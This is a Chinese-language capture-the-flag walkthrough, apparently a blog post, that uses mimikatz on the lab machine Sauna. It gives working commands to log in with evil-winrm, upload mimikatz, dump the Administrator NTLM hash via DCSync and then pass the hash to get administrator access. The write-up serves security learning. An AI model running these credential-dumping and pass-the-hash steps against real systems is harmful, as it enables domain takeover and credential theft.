今天要介紹的工具是mimikatz,它是由一個名叫Benjamin DELPY的法國人開發的,主要從lsass內存中獲得windows裡的明文密碼、雜湊值或是kerberos門票(tickets)。
這個範例我使用靶機Sauna說明,目前已經取得使用者svc_loanmgr的存取權,能夠登入目標靶機,但是需要提權才能夠拿到root.txt,接著使用mimikatz獲得NTLM的雜湊值。
在kali裡,已經有mimikatz不需要到github上下載,將目錄切換至mimikatz的檔案夾下,然後登入使用者svc_loanmgr。
cd /usr/share/windows-resource/mimikatz/Win32
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
因為目前我們已經在mimikatz的目錄底下,所以只需要下指令上傳mimikatz.exe。
upload mimikatz.exe
./mimikatz.exe "lsadump:dcsync /user:Administrator" "exit"
upload指令後面輸入mimikatz.exe的位置,如果不是在當前目錄下要修改路徑。接著,執行mimikatz.exe 擷取NTLM 的hash值。lsadump
代表向LSA伺服器從記憶體抓取雜湊值,並且利用dcsync的方式,假裝一個網域控制請求資料,藉此獲得hash。
最後,我們拿到了NTLM的雜湊值,我們就能夠利用evil-winrm
以administrator的身份登入。
evil-winrm -i 10.10.10.175 -u administrator -H [hash NTLM]
[hash value]
就是輸入從mimikatz所得到的NTLM hash值。
今天的介紹到此結束,謝謝:)